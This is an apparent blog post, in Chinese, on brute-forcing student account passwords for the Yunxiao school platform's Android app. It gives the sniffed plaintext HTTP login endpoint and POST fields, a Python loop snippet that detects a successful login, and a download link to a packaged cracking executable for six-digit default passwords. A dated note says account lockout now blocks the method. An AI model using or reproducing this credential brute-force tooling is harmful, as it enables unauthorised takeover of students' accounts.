2014.12.23更新：云校新功能：登录失败次数过多后将账号冻结30分钟，导致已无法利用

利用网页版由于需要发3次请求，而且用的是https，所以速度很慢。
而利用云校的android版客户端速度会有大提升
首先用wireshark抓一下包，看看请求包的结构。

发送的请求包中有一个deviceId，提交的是手机的特征码，deviceversion则是手机系统版本号，这个程序也没有异常登录提醒，不知道这是在干什么。剩下的就比较明显了，username就是用户名，password就是密码

http://passport.yunxiao.com:8088/passport/v1/login

POST：

username={替换为用户名}@bnds&appVersion=76&password={替换为密码}&deviceType=android

可以看到提交的包中是用http，而且没有验证用的随机数，爆破脚本可以很简单写出，登录成功后会返回json数据如下图

只需要判断一下”code”:1,”msg”:”ok”是否在返回的数据中即可。

Python验证脚本：

postdata = "username=" + username + "@bnds&appVersion=76&password=" + password + "&deviceType=android"
request = urllib2.Request(url, data = postdata)
response = urllib2.urlopen(request)
content = response.read()
if '"code":1,"msg":"ok"' in content:
    print " [*]Password found!n"
    print " [*]Password:" + password

已打包好的下载地址：

链接: http://pan.baidu.com/s/1mgyuVZq 密码: 9kqw

运行十一学校云校密码暴力破解.exe即可

注：此程序仅可以跑6位默认密码。本程序仅供学习使用